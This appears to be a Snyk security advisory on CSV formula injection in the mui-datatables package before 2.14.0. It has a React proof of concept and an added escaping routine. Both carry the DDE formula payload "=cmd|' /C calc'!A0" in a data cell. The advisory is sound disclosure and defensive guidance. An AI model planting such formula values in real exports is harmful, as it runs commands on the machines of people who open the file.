CSV Injection Affecting mui-datatables package, versions <2.14.0
Snyk CVSS: Attack Complexity: Low; User Interaction: Required
- Snyk ID SNYK-JS-MUIDATATABLES-174185
- published 14 Apr 2019
- disclosed 29 Mar 2019
- credit gregnb
How to fix?
Upgrade mui-datatables to version 2.14.0 or higher.
Overview
mui-datatables is a data tables component built on Material-UI.
Affected versions of this package are vulnerable to CSV Injection. CSV Injection, also known as Formula Injection, occurs when websites embed untrusted input inside CSV files. When a spreadsheet program is used to open a CSV, any cells starting with '=' will be interpreted by the software as a formula. Maliciously crafted formulas can be used for three key attacks:
- Hijacking the user's computer by exploiting vulnerabilities in the spreadsheet software.
- Hijacking the user's computer by exploiting the user's tendency to ignore security warnings in spreadsheets that they downloaded from their own website.
- Exfiltrating contents from the spreadsheet, or other open spreadsheets.
Proof Of Concept (PoC)
    import React from "react";
    import ReactDOM from "react-dom";
    import MUIDataTable from "mui-datatables";

    class App extends React.Component {
      render() {
        const columns = ["Name", "Title", "Location", "Age", "Salary"];
        // The first "Name" cell carries the formula payload; an affected
        // version writes it to the CSV export unescaped.
        const data = [
          ["=cmd|' /C calc'!A0", "Business Analyst", "Minneapolis", 30, "$100,000"],
          ["Aiden Lloyd", "Business Consultant", "Dallas", 55, "$200,000"],
          ["Jaden Collins", "Attorney", "Santa Ana", 27, "$500,000"]
        ];
        const options = {
          filterType: "dropdown",
          responsive: "scroll"
        };
        return (
          <MUIDataTable
            title={"ACME Employee list"}
            data={data}
            columns={columns}
            options={options}
          />
        );
      }
    }

    ReactDOM.render(<App />, document.getElementById("root"));
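As an added example (not code from the advisory or from the mui-datatables project), one way a CSV exporter neutralises cells like the one in the PoC: any string cell whose first character can start a spreadsheet formula is prefixed with a single quote, and the usual RFC 4180 quoting is applied. The function names and the trigger set are assumptions; the sample rows are constructed to mirror the PoC data.

```javascript
// Characters that common spreadsheet programs treat as the start of a
// formula when they appear first in a cell (assumed trigger set).
const FORMULA_TRIGGERS = new Set(["=", "+", "-", "@", "\t", "\r"]);

// Escape one cell for CSV output. Numbers pass through unchanged (they
// cannot carry a formula); string cells starting with a trigger character
// get a leading single quote so the spreadsheet shows them as literal text;
// cells containing commas, quotes or line breaks are double-quoted with
// inner quotes doubled.
function escapeCsvCell(value) {
  if (typeof value === "number") {
    return String(value);
  }
  let text = value === null || value === undefined ? "" : String(value);
  if (text.length > 0 && FORMULA_TRIGGERS.has(text[0])) {
    text = "'" + text;
  }
  if (/[",\r\n]/.test(text)) {
    text = '"' + text.replace(/"/g, '""') + '"';
  }
  return text;
}

// Build a CSV document from the same columns/data shape the PoC passes to
// MUIDataTable: an array of column names and an array of row arrays.
function buildCsv(columns, data) {
  const lines = [columns, ...data].map((row) =>
    row.map(escapeCsvCell).join(",")
  );
  return lines.join("\r\n") + "\r\n";
}

// Constructed sample rows mirroring the advisory's PoC data.
const SAMPLE_COLUMNS = ["Name", "Title", "Location", "Age", "Salary"];
const SAMPLE_DATA = [
  ["=cmd|' /C calc'!A0", "Business Analyst", "Minneapolis", 30, "$100,000"],
  ["Aiden Lloyd", "Business Consultant", "Dallas", 55, "$200,000"]
];

function exportSample() {
  return buildCsv(SAMPLE_COLUMNS, SAMPLE_DATA);
}
```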